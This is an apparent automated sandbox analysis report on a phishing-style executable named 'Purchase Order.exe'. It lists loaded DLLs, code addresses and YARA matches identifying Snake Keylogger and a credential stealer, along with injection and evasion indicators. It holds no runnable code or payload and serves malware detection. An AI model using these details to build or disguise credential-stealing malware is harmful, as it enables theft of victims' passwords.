            Source: initial sampleStatic PE information: Filename: Purchase Order.exe
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00C2D6040_2_00C2D604
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_06D616800_2_06D61680
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_06D635980_2_06D63598
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_06D635880_2_06D63588
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_06D67D0C0_2_06D67D0C
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_06D61AB80_2_06D61AB8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_06D612480_2_06D61248
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_06D631600_2_06D63160
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_015261684_2_01526168
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152C1F04_2_0152C1F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152B3884_2_0152B388
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152C4D04_2_0152C4D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_015267904_2_01526790
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152C7B24_2_0152C7B2
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_015298B84_2_015298B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_01524B314_2_01524B31
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152FA104_2_0152FA10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152CA924_2_0152CA92
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152EDF04_2_0152EDF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152BF104_2_0152BF10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_015221A84_2_015221A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152E3104_2_0152E310
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152E3004_2_0152E300
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0152B5524_2_0152B552
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_015235CA4_2_015235CA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCB6E84_2_06CCB6E8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCD6704_2_06CCD670
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC86084_2_06CC8608
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC8C5B4_2_06CC8C5B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCA4084_2_06CCA408
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCBD384_2_06CCBD38
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCAA584_2_06CCAA58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCC3884_2_06CCC388
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCB0A04_2_06CCB0A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC70504_2_06CC7050
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCD0284_2_06CCD028
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCC9D84_2_06CCC9D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC11A04_2_06CC11A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC5EC84_2_06CC5EC8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCB6E34_2_06CCB6E3
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC5EB84_2_06CC5EB8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCD66B4_2_06CCD66B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC560A4_2_06CC560A
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC56184_2_06CC5618
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC676A4_2_06CC676A
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC67784_2_06CC6778
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC37304_2_06CC3730
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC04884_2_06CC0488
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC04984_2_06CC0498
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC74974_2_06CC7497
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC74A84_2_06CC74A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC44304_2_06CC4430
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC85F84_2_06CC85F8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC0D484_2_06CC0D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC7D484_2_06CC7D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC7D584_2_06CC7D58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC0D394_2_06CC0D39
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCBD364_2_06CCBD36
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCF2A04_2_06CCF2A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCAA4B4_2_06CCAA4B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC5A604_2_06CC5A60
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC5A704_2_06CC5A70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCF2734_2_06CCF273
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC6BC14_2_06CC6BC1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC6BD04_2_06CC6BD0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCA3FB4_2_06CCA3FB
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCC3864_2_06CCC386
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC33A84_2_06CC33A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC33B84_2_06CC33B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC63124_2_06CC6312
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC63204_2_06CC6320
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC08E04_2_06CC08E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC08F04_2_06CC08F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC78F04_2_06CC78F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCB09B4_2_06CCB09B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC00404_2_06CC0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC70404_2_06CC7040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC00074_2_06CC0007
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC28074_2_06CC2807
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC28184_2_06CC2818
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCD0264_2_06CCD026
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCC9D34_2_06CCC9D3
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC518A4_2_06CC518A
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC51984_2_06CC5198
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC81A04_2_06CC81A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC81B04_2_06CC81B0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC79004_2_06CC7900
            Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.2018087751.0000000006B30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000000.1955472261.00000000002C8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEeBu.exe: vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.2013482317.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.2016001178.000000000275B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
            Source: Purchase Order.exe, 00000004.00000002.4419161581.0000000001278000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
            Source: Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
            Source: Purchase Order.exe, 00000004.00000002.4419016890.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order.exe
            Source: Purchase Order.exeBinary or memory string: OriginalFilenameEeBu.exe: vs Purchase Order.exe
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dpapi.dllJump to behavior
            Source: Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, XxFjHXMucdrtqTOWBP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, XxFjHXMucdrtqTOWBP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Purchase Order.exe.50e0000.11.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.Purchase Order.exe.2735630.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.Purchase Order.exe.2781750.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.Purchase Order.exe.273d648.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@4/4
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.logJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMutant created: NULL
            Source: Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Purchase Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Purchase Order.exe, 00000004.00000002.4420689970.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000321F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4422610576.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000322C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Purchase Order.exeReversingLabs: Detection: 21%
            Source: Purchase Order.exeVirustotal: Detection: 29%
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
